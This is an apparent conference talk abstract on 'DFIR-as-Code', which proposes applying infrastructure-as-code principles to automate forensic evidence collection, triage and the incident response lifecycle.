DFIR-as-Code: Scaling Incident Response Beyond Human Limits

Incident response is still broken. We still treat DFIR like an unpredictable, ad-hoc fire drill. Manual evidence collection, inconsistent analysis, and re-invented wheels on investigations. It’s time to evolve. DFIR-as-Code is the missing framework: a paved path for automating forensic data collection, enrichment, and triage. This talk breaks down how to apply IaC principles to DFIR, predefine secondary collection mechanisms, and map out an extended lifecycle that ensures repeatability, speed, and accuracy. Whether you’re hunting for adversaries in memory, uncovering new persistence mechanisms, or automating forensic pipelines, this session will show you how to shift DFIR from chaos to code – at scale.

Some concepts of DFIR-as-Code have been used in many large environments where scale preempts performing things manually. This talk provides a framework for evolving how DFIR is currently performed from art into science. By leveraging successful IaC concepts in the continually evolving DFIR landscape, defenders can continually improve threat detection, and decrease response time across many different facets of the incident response lifecycle.